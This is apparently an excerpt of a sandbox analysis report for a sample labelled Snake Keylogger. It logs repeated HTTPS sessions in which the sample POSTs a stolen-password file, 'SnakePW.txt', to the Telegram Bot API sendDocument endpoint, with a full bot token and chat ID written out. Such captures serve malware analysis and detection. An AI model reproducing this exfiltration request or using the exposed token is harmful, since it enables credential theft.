                                                                    2022-06-26 07:33:18 UTC154INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66849,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228797,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    92192.168.2.549939149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:18 UTC155OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ebf3e97a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:18 UTC155OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 62 66 33 65 39 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ebf3e97aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:18 UTC156INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:18 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:18 UTC156INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66850,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228798,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    93192.168.2.549940149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:18 UTC157OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ec31e688
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:18 UTC157OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 63 33 31 65 36 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ec31e688Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:18 UTC157INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:18 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:18 UTC158INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66851,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228798,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    94192.168.2.549941149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:18 UTC158OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ec6d811d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:18 UTC159OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 63 36 64 38 31 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ec6d811dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:19 UTC159INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:19 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:19 UTC159INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66852,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228799,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    95192.168.2.549942149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:19 UTC160OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756eca456b6
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:19 UTC160OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 63 61 34 35 36 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756eca456b6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:19 UTC161INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:19 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:19 UTC161INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66853,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228799,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    96192.168.2.549943149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:19 UTC162OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ece719b2
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:19 UTC162OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 63 65 37 31 39 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ece719b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:20 UTC162INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:19 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:20 UTC163INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66854,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228799,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    97192.168.2.549944149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:20 UTC163OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ed25162a
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:20 UTC164OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 64 32 35 31 36 32 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ed25162aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:20 UTC164INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:20 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:20 UTC165INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66856,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228800,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    98192.168.2.549945149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:20 UTC165OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756ed598a5e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:20 UTC165OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 64 35 39 38 61 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756ed598a5eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:20 UTC166INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:20 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
